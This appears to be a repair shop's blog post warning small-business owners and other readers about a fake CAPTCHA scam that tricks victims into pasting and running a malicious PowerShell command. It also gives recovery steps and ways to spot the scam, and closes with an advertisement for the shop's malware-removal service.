There's a scam spreading fast right now — through Google ads, Facebook ads, and fake business profile pages — and it's clever enough that it nearly caught me. I want to describe it in detail so you know what to look for before it gets you.
Here's how it works
You click an ad — maybe it looks like your Google Business Profile, a software download, a government site, or something from a brand you recognize. The page loads and shows you what looks like a standard CAPTCHA: "Verify you are not a robot." Nothing unusual so far.
But this CAPTCHA doesn't have checkboxes or image grids. Instead, it gives you instructions:
- Press Windows key + R to open the Run dialog (or tells you to open Command Prompt).
- Press Ctrl + V to paste.
- Press Enter.
That's it. "Verification complete." Looks harmless. Except what just happened is this: when the fake page loaded, it silently copied a malicious command to your clipboard. When you pressed Ctrl+V and Enter, you pasted and executed that command yourself. You just installed malware — and Windows let it happen because you ran it, not a suspicious file attachment.
Why this works so well
Most people have been trained not to open email attachments from strangers. But this skips the attachment entirely. There's no file to scan, no suspicious download prompt. You're just following what looks like a routine verification step — something you've probably done dozens of times on legitimate sites.
The command being pasted is usually a PowerShell script. PowerShell is a built-in Windows tool designed for system administration. When you run it from the Run dialog, Windows doesn't ask for confirmation the way it does when you double-click an .exe. It just runs. The script typically downloads and installs an infostealer — malware designed to quietly grab your saved passwords, browser cookies, and banking details.
What to do if you did this
If you followed those steps on a page like this, assume your machine is compromised until proven otherwise. The priority order:
- Disconnect from the internet — unplug your ethernet cable or turn off Wi-Fi. This stops the malware from sending your data out if it's still in the process of doing so.
- Change your passwords from a different device — your phone, a family member's laptop, anything that wasn't connected when you ran the command. Start with email, then banking, then anything else that matters. Do this before reconnecting the infected machine.
- Don't log into anything on the affected computer until it's been cleaned. If the infostealer is still running, everything you type could be captured.
- Get the machine cleaned — a full malware removal, not just a quick scan. Most standard antivirus tools won't catch everything an infostealer drops.
How to spot this scam before you fall for it
The tell is the instruction to open Command Prompt or press Windows + R. No real CAPTCHA, no legitimate website, no real business will ever ask you to do that. CAPTCHAs work in the browser. If a "verification" step requires you to leave the browser and open a system tool, stop immediately — that's the scam.
It also tends to show up on pages that don't quite look right: slightly off fonts, a URL that doesn't match the brand, a page that loads instantly with no real content behind it. But the fake pages are getting better. When in doubt, close the tab.
Who's being targeted
Right now this is showing up heavily in ads targeting small business owners — fake Google Business Profile pages, fake Microsoft account alerts, fake software license renewals. If you're running a business and managing your own online presence, you're in the target range. Share this with anyone in your orbit who might not know what to look for.
We're in Dawsonville
If you or someone you know already ran the command and needs the machine cleaned, call us. We do full malware removal — not just a scan, but manual verification that the system is actually clean. (706) 203-2563 or start a repair request here. Remote service is available if you're not local.